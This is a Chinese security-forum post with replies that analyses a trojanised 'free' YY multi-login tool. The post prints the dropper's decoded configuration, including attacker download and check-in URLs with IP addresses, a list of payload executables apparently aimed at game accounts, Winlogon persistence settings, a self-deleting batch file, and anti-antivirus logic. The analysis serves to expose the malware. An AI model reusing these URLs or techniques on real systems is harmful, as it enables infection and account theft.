首页
论坛
专栏
课程

[原创]YY神马免费版

2011-10-2 17:45 6280

[原创]YY神马免费版

2011-10-2 17:45
6280
其实吧,身在**,最不可信的用词莫过于“免费”了。我只是想找个东西分析一下YY的登录协议自己写个多开去捧捧某人的频道而已。

下载下来是一个RAR,解压缩。
然后是一个EXE,拖进OD,这个一个NSIS安装程序,拖进Universal Extractor解包。
然后是2个EXE,一个是同名EXE,另一个是kk1.exe,顿时我就黑化了……
把kk1拖进OD,看起来像ASM的杰作。然后例行释放了UpdateUsp.dll,usp10.dll,SystemUpdate.exe,当然肯定是在System32里面。话说写教程的时候按错键了,等下又要重装VM了。唉……

然后在写SystemUpdate.exe的时候从kk1.exe的尾部解码了一个神奇的字符串:
OOOOOOhttp://119.147.134.164:1234/yy.txt|C:\WINDOWS\boot.ini
CCCCCChttp://174.139.107.242:1234/get.asp
VVVVVVkk1

打开一个IE:
http://119.147.134.164:1234/yy.txt内容:

http://119.147.134.164:4321/yym.exe
http://119.147.134.164:4321/qqm.exe
http://119.147.134.164:4321/dnf1.exe
http://119.147.134.164:4321/cq1.exe
http://119.147.134.164:4321/gl1.exe
http://119.147.134.164:4321/wow1.exe
http://119.147.134.164:4321/tl2.exe
http://119.147.134.164:4321/qqsg.exe
http://119.147.134.164:4321/qqhx1.exe
http://119.147.134.164:4321/zx2.exe
http://119.147.134.164:4321/gj.exe
http://119.147.134.164:4321/gr.exe

真的没什么好说的……

然后我们来看SystemUpdate.exe
在HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogo下面的:C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\Tasks\conime.exe
其次把自己复制到%windir%/tasks/conime.exe然后执行
然后创建一个dll.bat,内容如下:
@echo off
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@del 3596799a1543bc9f.aqq
@del "C:\SystemUpdate.exe"
@del dll.bat
@exit
然后真的Exit了,当然这只是发现自己不是在C:\WINDOWS\Tasks里面的时候执行的部分。

然后来看是的时候得流程:
果断的读取附加字节。
OOOOOOhttp://119.147.134.164:1234/yy.txt|C:\WINDOWS\boot.ini       =      UrlDownloadFileA http://119.147.134.164:1234/yy.txt->C:\WINDOWS\boot.ini
然后依次下载里面的那些exe,然后删除boot.ini
CCCCCChttp://174.139.107.242:1234/get.asp VVVVVVkk1 的用法:
http://174.139.107.242:1234/get.asp?mac=00-0c-29-8a-1c-ce&ver=kk1&pnum=29
这么明了的字符串就不解释了吧。
提交之后就返回了五个字符“addok”如果最后pnum不是29的话,那就是“updateok”
然后休息一会儿继续上面2步

下面来看UpdateUsp.dll,说真的,我不相信一个几十K的exe能释放出一个几百K的dll,所以它的源文件名告诉我这个是原始的usp10.dll。

然后是释放出来的6.5K的usp10.dll(NewDownload.dll):
首先看看,是360娘加载了我么?是的话就一起死吧!
然后是Explorer加载了我么?不是的话,那就算了吧。是的话就建一个线程。

线程:
使用HKLM\Software\360Safe\menuext\LiveUpdate360下的Application键值查找SoftMgr.exe,但并没有感染。
然后执行SystemUpdate.exe和360的SoftMgr.exe

[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

最新回复 (8)
邓韬 9 2011-10-2 18:28
2
0
没看懂什么意思
无聊的菜鸟 9 2011-10-2 21:08
3
0
没有什么意思,例行的免费程序+挂马。
hackerlzc 10 2011-10-3 09:50
4
0
免费的后果,呵呵。没有安全感。
aylf 2011-10-3 10:17
5
0
什么乱七八糟的, 没弄明白,最好些清楚点。
今夕望月 2011-10-3 10:44
6
0
哈,原来如此,仔细琢磨下标题,原来是分析某YY多开啊
dayang 2011-10-3 12:00
7
0
你就说你分析出来绑马了,就行了
flong 2011-10-4 21:56
8
0
YY多开器-YY神马工作室
setbat 2011-12-11 22:29
9
0
看不懂写了什么,愿楼主详细说明下。
游客
登录 | 注册 方可回帖
返回